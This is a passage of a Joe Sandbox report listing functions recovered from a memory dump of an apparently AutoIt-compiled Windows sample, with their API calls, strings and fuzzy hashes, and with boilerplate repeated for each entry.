Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 2323102230-1173974218
Opcode ID: c619b08c6a1fcf9b73e5620cc15beffce0888999de9c33bf8bdae1454dbf7d70
Instruction ID: 8554e6d4c091f3c9b9da6d41ba2f933ebd4cafe7d52a9c8b90dd66045ad83ffc
Opcode Fuzzy Hash: c619b08c6a1fcf9b73e5620cc15beffce0888999de9c33bf8bdae1454dbf7d70
Instruction Fuzzy Hash: 9E311EB1800219AACF55EFA4DC45BDDB7B8AF08314F5445AAE509E3141EB30DB89CF74

Function 00D82FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00D82FE0
__wcsnicmp.LIBCMT ref: 00D83001
__wcsnicmp.LIBCMT ref: 00D8301B

Strings

#requireadmin, xrefs: 00D82FFB
#notrayicon, xrefs: 00D82FD8
#OnAutoItStartRegister, xrefs: 00D83015

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: ad0e420a0c3a0e540626d05635b4fe4b479b2f9ff350725c1c3534cfdfb5e45f
Instruction ID: 2ce1750426c731996a265cfb5751e21e0879b3f0f5af3713d1138ba74606cf36
Opcode Fuzzy Hash: ad0e420a0c3a0e540626d05635b4fe4b479b2f9ff350725c1c3534cfdfb5e45f
Instruction Fuzzy Hash: 892129321446117BD631BB399C02EBB73E9DF69750F144426F98987181EBA1DA82D3B1

Function 00D817C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D8180D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D81833
SysAllocString.OLEAUT32(00000000), ref: 00D81836
SysAllocString.OLEAUT32 ref: 00D81857
SysFreeString.OLEAUT32 ref: 00D81860
StringFromGUID2.COMBASE(?,?,00000028), ref: 00D8187A
SysAllocString.OLEAUT32(?), ref: 00D81888

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 1957f0ce31b6c6747b2e7961e1eded17b010033aad43cd1fd71a584b115ce302
Instruction ID: 82055b1f9b8d37909a02fb414a84e4172c2b027b7fd8915f26f6cb9a2d8daccd
Opcode Fuzzy Hash: 1957f0ce31b6c6747b2e7961e1eded17b010033aad43cd1fd71a584b115ce302
Instruction Fuzzy Hash: 27217435604205BF9B10ABE8CC89DBAB7ECEF09360B448125F915DB264DA74EC468B70

Function 00DAA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D5C657
Part of subcall function 00D5C619: GetStockObject.GDI32(00000011), ref: 00D5C66B
Part of subcall function 00D5C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5C675

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DAA13B
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DAA148
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DAA153
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DAA162
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DAA16E

Strings

Msctls_Progress32, xrefs: 00DAA10C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 3bc0d107de71cc75376edb2239e30b863c1218d751f08d8922ae1eaee78c25c3
Instruction ID: bcdec6f03021ff31b6149198d0e10be5048ff455d5a3e06b6b47edb43054810a
Opcode Fuzzy Hash: 3bc0d107de71cc75376edb2239e30b863c1218d751f08d8922ae1eaee78c25c3
Instruction Fuzzy Hash: B6115EB1150219BEEF155F65CC86EE77F5DEF09798F014215FA08A6090C6729C21DBB4

Function 00D64C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00D64C3E

Part of subcall function 00D686B5: GetLastError.KERNEL32(?,00D60127,00D688A3,00D64673,?,?,00D60127,?,00D4125D,00000058,?,?), ref: 00D686B7
Part of subcall function 00D686B5: __calloc_crt.LIBCMT ref: 00D686D8
Part of subcall function 00D686B5: GetCurrentThreadId.KERNEL32 ref: 00D68701
Part of subcall function 00D686B5: SetLastError.KERNEL32(00000000,00D60127,00D688A3,00D64673,?,?,00D60127,?,00D4125D,00000058,?,?), ref: 00D68719

CloseHandle.KERNEL32(?,?,00D64C1D), ref: 00D64C52
__freeptd.LIBCMT ref: 00D64C59
RtlExitUserThread.NTDLL(00000000,?,00D64C1D), ref: 00D64C61
GetLastError.KERNEL32(?,?,00D64C1D), ref: 00D64C91
RtlExitUserThread.NTDLL(00000000,?,?,00D64C1D), ref: 00D64C98
__freefls@4.LIBCMT ref: 00D64CB4

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
String ID:
API String ID: 1445074172-0
Opcode ID: e1257dc2cb89d3f7b31fae7f0310f2a83851ea81c7fd8ad06c5719acdf72be06
Instruction ID: 210c99f71e6c27df59f9b278efa7ff73863945a8fbeeffa60c78c070a744cd05
Opcode Fuzzy Hash: e1257dc2cb89d3f7b31fae7f0310f2a83851ea81c7fd8ad06c5719acdf72be06
Instruction Fuzzy Hash: 7F01F271401742AFC718BBB8DD0990D7BA6FF043147148628F809DB352EF34D8429BB2

Function 00DAE13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DAE14D
_memset.LIBCMT ref: 00DAE15C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E03EE0,00E03F24), ref: 00DAE18B
CloseHandle.KERNEL32 ref: 00DAE19D

Strings

>, xrefs: 00DAE147
$?, xrefs: 00DAE156

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: $?$>
API String ID: 3277943733-2278415509
Opcode ID: a242d56c26fa35b52fc246003d9c7c4b3bb7147ab4e5d6b6667cebce791f17fa
Instruction ID: 66f4633f26e908622c0719205d3aad21dc7a5d11c7682ad973d914725e0b9315
Opcode Fuzzy Hash: a242d56c26fa35b52fc246003d9c7c4b3bb7147ab4e5d6b6667cebce791f17fa
Instruction Fuzzy Hash: B5F082F1A40312BFF3105B76AC06FB77A6DDB09394F040521BA14E61A2D7B78E8086B8

Function 00D5C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00D5C6C0
GetWindowRect.USER32(?,?), ref: 00D5C701
ScreenToClient.USER32(?,?), ref: 00D5C729
GetClientRect.USER32(?,?), ref: 00D5C856
GetWindowRect.USER32(?,?), ref: 00D5C86F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 59c052a4714c4575dad9cb7863601216dab02698e504b3f5e04030892fcd9ccc
Instruction ID: 80ad53bac676acc5b69366e8ef2e42eb71ed68efed3dbea4ff0d8a756cef751a
Opcode Fuzzy Hash: 59c052a4714c4575dad9cb7863601216dab02698e504b3f5e04030892fcd9ccc
Instruction Fuzzy Hash: 3DB1197991024ADFDF10CFA8C9807E9BBB1FF08311F149569EC99AB654DB30A944CB64

Function 00D89569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D896BC
_memmove.LIBCMT ref: 00D895F7

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

_memmove.LIBCMT ref: 00D8966A
_memmove.LIBCMT ref: 00D89751
_memmove.LIBCMT ref: 00D8976A
_memmove.LIBCMT ref: 00D89786

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
Instruction ID: f6ff446f2e3eb71e5545af0d02752436220e1de60c72fd9dd80ecee69d322197
Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
Instruction Fuzzy Hash: 4261783051024AABDB01FF60CC92EFE77A9EF45314F084459F89A6B292EB34E905DB71

Function 00DA1AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00DA1B09
Process32FirstW.KERNEL32(00000000,?), ref: 00DA1B17
__wsplitpath.LIBCMT ref: 00DA1B45

Part of subcall function 00D6297D: __wsplitpath_helper.LIBCMT ref: 00D629BD

_wcscat.LIBCMT ref: 00DA1B5A
Process32NextW.KERNEL32(00000000,?), ref: 00DA1BD0
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00DA1BE2

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 6d69f4162837036eec6975099c94dc419ba00db083a74961333d070f837f7533
Instruction ID: 217bffcf7562bb1e1c112a2afed869a2a997ee4af2220d19f933ce5f641f2553
Opcode Fuzzy Hash: 6d69f4162837036eec6975099c94dc419ba00db083a74961333d070f837f7533
Instruction Fuzzy Hash: E0513B715043019FD710EF24D885EABB7E8EF89754F14492EF98597251EB70EA08CBB2

Function 00DA2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

Part of subcall function 00DA3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DA2AA6,?,?), ref: 00DA3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DA2FA0
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DA2FE0
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00DA3003
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DA302C
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DA306F
RegCloseKey.ADVAPI32(00000000), ref: 00DA307C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 2e3e11b8b49dcedbfe14ba90521fc747ee8e414f3bf9c51039d34db0c5a86934
Instruction ID: 2803f9beadfd045832d13396b7975640d4a11d253dd4526871c03247a4f903c9
Opcode Fuzzy Hash: 2e3e11b8b49dcedbfe14ba90521fc747ee8e414f3bf9c51039d34db0c5a86934
Instruction Fuzzy Hash: 3F513631118205AFC704EF68CC85E6ABBEAFF89714F04491DF596872A1DB71EA05CB72

Function 00D5DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00D5DCC0
_wcscat.LIBCMT ref: 00D5DCC7
_wcscpy.LIBCMT ref: 00DB3CCB

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _wcscpy$_wcscat
String ID:
API String ID: 2037614760-0
Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
Instruction ID: 544129874a7a8799a04cc3b3702334407303b505e04bed9d6bc6cf305b83fda8
Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
Instruction Fuzzy Hash: 4951C430904215ABCF21EF98C4419BDB7B2EF08712F58404AFD81AB251DB749F85DBB1

Function 00D82ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D82AF6
VariantClear.OLEAUT32(00000013), ref: 00D82B68
VariantClear.OLEAUT32(00000000), ref: 00D82BC3
_memmove.LIBCMT ref: 00D82BED
VariantClear.OLEAUT32(?), ref: 00D82C3A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D82C68

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: bc8ee4ff445694ea91eb8be65c3b24aa0fb0ddba054dfa62b2a5c97f892e7989
Instruction ID: 3c5e927dfac56e5a7b685ccd7361924cd69042085d1fc262b692b8fc128c03fd
Opcode Fuzzy Hash: bc8ee4ff445694ea91eb8be65c3b24aa0fb0ddba054dfa62b2a5c97f892e7989
Instruction Fuzzy Hash: 3C516CB5A0020AEFCB14DF58C884EAAB7B9FF4C314B158559E949DB314E330E951CFA0

Function 00DA82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00DA833D
GetMenuItemCount.USER32(00000000), ref: 00DA8374
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DA839C
GetMenuItemID.USER32(?,?), ref: 00DA840B
GetSubMenu.USER32(?,?), ref: 00DA8419
PostMessageW.USER32(?,00000111,?,00000000), ref: 00DA846A

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: d4bac077a34416f600f5859e36c6b857cafc02dfce1cddf4b2db3172324e4b14
Instruction ID: 2175d6cd324d4646400dd39c054f4717c7f0806bcaefee7f8e1885702c1c496d
Opcode Fuzzy Hash: d4bac077a34416f600f5859e36c6b857cafc02dfce1cddf4b2db3172324e4b14
Instruction Fuzzy Hash: 72519C71A0021AAFCF00EFA4C841AAEBBB5EF49710F144069ED15FB351DB70AE419BB0

Function 00D854E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D8552E
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D85579
IsMenu.USER32(00000000), ref: 00D85599
CreatePopupMenu.USER32 ref: 00D855CD
GetMenuItemCount.USER32(000000FF), ref: 00D8562B
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00D8565C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: aca42b9f024f06ac55e86f14176326a8eb8ae35f7f1e49c0b4412b2c2eef4980
Instruction ID: 9737452ae55cae3b224b83108854041ff035f0a7281cdd997662886f7e8dc682
Opcode Fuzzy Hash: aca42b9f024f06ac55e86f14176326a8eb8ae35f7f1e49c0b4412b2c2eef4980
Instruction Fuzzy Hash: 2251E4B0600706EFDF10EF68E889BADBBF5EF05314F584269E4559B298E3709944CB71

Function 00D5B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

BeginPaint.USER32(?,?,?,?,?,?), ref: 00D5B1C1
GetWindowRect.USER32(?,?), ref: 00D5B225
ScreenToClient.USER32(?,?), ref: 00D5B242
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D5B253
EndPaint.USER32(?,?), ref: 00D5B29D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
